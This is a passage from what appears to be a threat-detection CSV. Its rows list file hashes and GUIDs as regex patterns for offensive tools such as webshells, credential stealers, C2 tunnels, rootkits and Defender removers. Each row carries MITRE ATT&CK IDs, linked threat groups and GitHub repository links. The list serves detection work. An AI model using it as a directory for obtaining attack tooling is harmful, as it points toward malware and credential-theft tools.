- TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#filehash","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","20646" "*0031268c9cdcadd2f9c9c0b7655ba40ebbca9f506cea829cb0ad0a96cc51022d*",".{0,1000}0031268c9cdcadd2f9c9c0b7655ba40ebbca9f506cea829cb0ad0a96cc51022d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20647" "*0033346a10079dc04814e00f7717d40f104b309c5b8a0a8956fd871e305b8ae4*",".{0,1000}0033346a10079dc04814e00f7717d40f104b309c5b8a0a8956fd871e305b8ae4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20648" "*0037e201d072aabd5bf4f22b6c9eb7f780d5007616dd130e8ffcdbd8d491c509*",".{0,1000}0037e201d072aabd5bf4f22b6c9eb7f780d5007616dd130e8ffcdbd8d491c509.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","20649" "*00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a*",".{0,1000}00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20650" "*004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524*",".{0,1000}004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20652" "*0044dbbe7f768c5b5464cca3fc0ace9850b2b41b628cb469a8173578f1d6335f*",".{0,1000}0044dbbe7f768c5b5464cca3fc0ace9850b2b41b628cb469a8173578f1d6335f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20654" "*004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f*",".{0,1000}004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20655" "*005b0d233056c44a7c6a57a078d00bc23b07d0f643a23ead7267be2d11a23f2a*",".{0,1000}005b0d233056c44a7c6a57a078d00bc23b07d0f643a23ead7267be2d11a23f2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20657" "*005dff69ec258cc35c2a45f0103570c28895b910e4f987af28daa7c5b7c22926*",".{0,1000}005dff69ec258cc35c2a45f0103570c28895b910e4f987af28daa7c5b7c22926.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20658" "*00630066-0B43-474E-A93B-417CF1A65195*",".{0,1000}00630066\-0B43\-474E\-A93B\-417CF1A65195.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","#GUIDproject","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","20660" "*006ace1aaf8ef3027f96f25e3408b9a95c11bc2009288e570de2c013daaaea32*",".{0,1000}006ace1aaf8ef3027f96f25e3408b9a95c11bc2009288e570de2c013daaaea32.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","20661" "*006ad795269259c08e5b8e1816e05a4bbb52c97997ff238180afbc53365d3428*",".{0,1000}006ad795269259c08e5b8e1816e05a4bbb52c97997ff238180afbc53365d3428.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","20662" "*006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7*",".{0,1000}006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20663" "*00758b7af992689b4d0b128b19582828b871c4332bfe1d9732d39118099b398b*",".{0,1000}00758b7af992689b4d0b128b19582828b871c4332bfe1d9732d39118099b398b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","20666" "*0075f7d5a315c6bf6d8bbe89a2481e673a8a61e79afbe89afd33e11634fd1caa*",".{0,1000}0075f7d5a315c6bf6d8bbe89a2481e673a8a61e79afbe89afd33e11634fd1caa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","20667" 
"*00895d7e0a42f794de5f471a41c0cd996ee3298a4183834cb8b99f10552a5e1c*",".{0,1000}00895d7e0a42f794de5f471a41c0cd996ee3298a4183834cb8b99f10552a5e1c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","20669" "*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20670" "*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20671" "*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20672" "*0095a4e305c7c32e6f8d906895a66a6a7563ea1b2ced2676a1a7af3cb2546e5a*",".{0,1000}0095a4e305c7c32e6f8d906895a66a6a7563ea1b2ced2676a1a7af3cb2546e5a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20673" "*009cd370780fdcd4471165da2278c8bb65d4837457a253d4d4bd42e9d88e3e9f*",".{0,1000}009cd370780fdcd4471165da2278c8bb65d4837457a253d4d4bd42e9d88e3e9f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20676" "*009e013613ce6435e4a83fadf560f9b19e3adbb774ae2d7daab7fef6e6bd586d*",".{0,1000}009e013613ce6435e4a83fadf560f9b19e3adbb774ae2d7daab7fef6e6bd586d.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","20677" "*009f7df0ef3989ea2100166e4e56ec4182d3819f3027eadff3b53a50f20bc0c5*",".{0,1000}009f7df0ef3989ea2100166e4e56ec4182d3819f3027eadff3b53a50f20bc0c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using 
open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20678" "*00a2407eb70a40f0054d83e92cc9e8e85b010bfcc75ab5bab1ced62f81622d92*",".{0,1000}00a2407eb70a40f0054d83e92cc9e8e85b010bfcc75ab5bab1ced62f81622d92.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20679" "*00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69*",".{0,1000}00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20680" "*00ae099c6c9284ab4cccd689e66872e5683c2665e3f73936d6e1f98cf248c775*",".{0,1000}00ae099c6c9284ab4cccd689e66872e5683c2665e3f73936d6e1f98cf248c775.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20681" "*00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552*",".{0,1000}00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20684" "*00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b*",".{0,1000}00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20685" "*00bef672112754668bde734e62d22239737350e0d16b2984990f097d0db51c02*",".{0,1000}00bef672112754668bde734e62d22239737350e0d16b2984990f097d0db51c02.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","20686" "*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20688" "*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20689" "*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20690" "*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20691" "*00cce05cfc7ac3c284be62e98c8ffb25*",".{0,1000}00cce05cfc7ac3c284be62e98c8ffb25.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","20693" "*00D7268A-92A9-4CD4-ADDF-175E9BF16AE0*",".{0,1000}00D7268A\-92A9\-4CD4\-ADDF\-175E9BF16AE0.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","20696" "*00de5c3931a567291bf9893e217004b8d6d7fd834798e80a60c7e97ac9d1f346*",".{0,1000}00de5c3931a567291bf9893e217004b8d6d7fd834798e80a60c7e97ac9d1f346.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","20697" "*00e574776767b1adaccff7b62bdb544633c806d5bde00c267edbcd3459e23d89*",".{0,1000}00e574776767b1adaccff7b62bdb544633c806d5bde00c267edbcd3459e23d89.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","20700" "*00e5dee46223200a6ec5fe8cb742dfa3dbcab1738233944c7fc8b66fc56e10e1*",".{0,1000}00e5dee46223200a6ec5fe8cb742dfa3dbcab1738233944c7fc8b66fc56e10e1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - 
T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20701" "*00edd865b583264ec504752b1a3c233313808b9d531a0f850998fe01a9522de2*",".{0,1000}00edd865b583264ec504752b1a3c233313808b9d531a0f850998fe01a9522de2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20703" "*00f30b9daeee37dd8ae0c6e0f61b14b3de19d45f504ba5d288f2a45dfe3cc652*",".{0,1000}00f30b9daeee37dd8ae0c6e0f61b14b3de19d45f504ba5d288f2a45dfe3cc652.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","20704" "*00fb3eb58122daa2d401298b41db03757020c44cd4a41b664be65bec45008f63*",".{0,1000}00fb3eb58122daa2d401298b41db03757020c44cd4a41b664be65bec45008f63.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","20706" "*00fe1c60b036ec30ac7334f710f0f923fdc5c702808cdda67c9d5a6fb2041ee8*",".{0,1000}00fe1c60b036ec30ac7334f710f0f923fdc5c702808cdda67c9d5a6fb2041ee8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20707" "*01_all_exploits_have_payloads_test*",".{0,1000}01_all_exploits_have_payloads_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20709" "*0105d13e4b33829b13ab839a9cad10f135b65528af0030a20060a190b3e2753f*",".{0,1000}0105d13e4b33829b13ab839a9cad10f135b65528af0030a20060a190b3e2753f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20710" "*010eb2bab7b24ddaec85ddd15383b64286cf8791ba4556c465e806d7235eab1c*",".{0,1000}010eb2bab7b24ddaec85ddd15383b64286cf8791ba4556c465e806d7235eab1c.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20712" "*013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8*",".{0,1000}013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20715" "*014b459f4eff259806b56b536fd24475d1824a82213f2b4e174f7650c1cd81db*",".{0,1000}014b459f4eff259806b56b536fd24475d1824a82213f2b4e174f7650c1cd81db.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - 
Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20717" "*0151aacf718ab65be46770339559ebaffa2cade02a77202d0cef37100856c95a*",".{0,1000}0151aacf718ab65be46770339559ebaffa2cade02a77202d0cef37100856c95a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20719" "*015A37FC-53D0-499B-BFFE-AB88C5086040*",".{0,1000}015A37FC\-53D0\-499B\-BFFE\-AB88C5086040.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#GUIDproject","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","20722" "*0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21*",".{0,1000}0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - 